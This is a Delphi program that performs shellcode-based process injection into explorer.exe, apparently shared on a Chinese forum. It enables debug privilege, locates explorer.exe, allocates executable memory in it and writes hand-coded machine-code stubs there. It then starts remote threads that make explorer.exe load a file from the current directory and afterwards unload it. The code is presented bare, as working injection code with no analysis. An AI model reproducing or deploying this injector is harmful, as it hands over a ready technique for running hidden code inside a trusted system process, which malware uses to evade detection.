program Project1;
uses
sysutils,windows,tlhelp32;
{$R *.res}
var
data1:array[0..25] of byte = (
$E8, $00, $00, $00,
$00, $5D, $83, $ED,
$05, $8D, $45, $30,
$50, $FF, $95, $30,
$01, $00, $00, $05,
$00, $10, $00, $00,
$FF, $E0
);
data2:array[0..35] of byte = (
$E8, $00, $00, $00,
$00, $5D, $83, $ED,
$05, $8D, $45, $30,
$50, $FF, $95, $34,
$01, $00, $00, $50,
$50, $FF, $95, $38,
$01, $00, $00, $FF,
$95, $38, $01, $00,
$00, $C2, $04, $00
);
//Adjust process Privilege for injection
procedure AdjustPrivilege(pid:integer; bEnable:boolean);
var
hProcess:THANDLE;
hToken:THANDLE;
tkp,PrevTokenPriv: TTokenPrivileges;
ReturnLength: DWORD;
begin
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := 0;
if (bEnable=true) then
begin
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
end;
if (LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid)=true) then
begin
hProcess := OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (hProcess>0) then
begin
if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)=true ) then
begin
if (AdjustTokenPrivileges(hToken, FALSE, tkp, SizeOf(TTOKENPRIVILEGES), PrevTokenPriv, ReturnLength)=true) then
begin
CloseHandle(hToken);
end;
end;
CloseHandle(hProcess);
end;
end;
end;
//Find Explorer Process
function FindExplorer():DWORD;
var
hC:THANDLE;
Next:boolean;
p32:PROCESSENTRY32;
begin
hC := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
Next := Process32First(hC, p32);
while (Next) do
begin
if (StrIComp(p32.szExeFile, 'EXPLORER.EXE') = 0) then
begin
result := p32.th32ProcessID;
exit;
end;
Next := Process32Next(hC, p32);
end;
CloseHandle(hC);
result:= 0;
end;
//MakeData1
procedure MakeData1(Address:pointer);
var
szFileName:array[0..MAX_PATH] of char;
begin
GetCurrentDirectory(MAX_PATH, szFileName);
StrCat(szFileName, '\ollydbg.exe');
StrCopy(pchar(Address)+$30, szFileName);
PDWORD(pchar(Address)+$130)^ := DWORD(GetProcAddress(GetModuleHandle('kernel32'), 'LoadLibraryA'));
PDWORD(pchar(Address)+$134)^ := DWORD(GetProcAddress(GetModuleHandle('kernel32'), 'GetModuleHandleA'));
PDWORD(pchar(Address)+$138)^ := DWORD(GetProcAddress(GetModuleHandle('kernel32'), 'FreeLibrary'));
CopyMemory(Address, @data1, sizeof(data1));
end;
//MakeData2
procedure MakeData2(Address:pointer);
begin
CopyMemory(Address, @data2, sizeof(data2));
end;
//OEP
var
PID:DWORD;
hProcess:THANDLE;
hThread:THANDLE;
LocalAddress:PBYTE;
RemoteAddress:PBYTE;
temp:DWORD;
begin
AdjustPrivilege(GetCurrentProcessId(), TRUE);
PID := FindExplorer();
if (PID = 0) then
begin
exit;
end;
hProcess := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE, FALSE, PID);
if (hProcess = 0) then
begin
exit;
end;
LocalAddress := PBYTE(VirtualAlloc(nil, $1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE));
RemoteAddress := PBYTE(VirtualAllocEx(hProcess, nil, $1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE));
MakeData1(LocalAddress);
WriteProcessMemory(hProcess, RemoteAddress, LocalAddress, $1000, temp);
hThread := CreateRemoteThread(hProcess, nil, 0, RemoteAddress, nil, 0, temp);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
MakeData2(LocalAddress);
WriteProcessMemory(hProcess, RemoteAddress, LocalAddress, $1000, temp);
hThread := CreateRemoteThread(hProcess, nil, 0, RemoteAddress, nil, 0, temp);
WaitForSingleObject(hThread, INFINITE);
VirtualFree(LocalAddress, 0, MEM_RELEASE);
VirtualFreeEx(hProcess, RemoteAddress, 0, MEM_RELEASE);
end.
不错,帮你把代码贴上来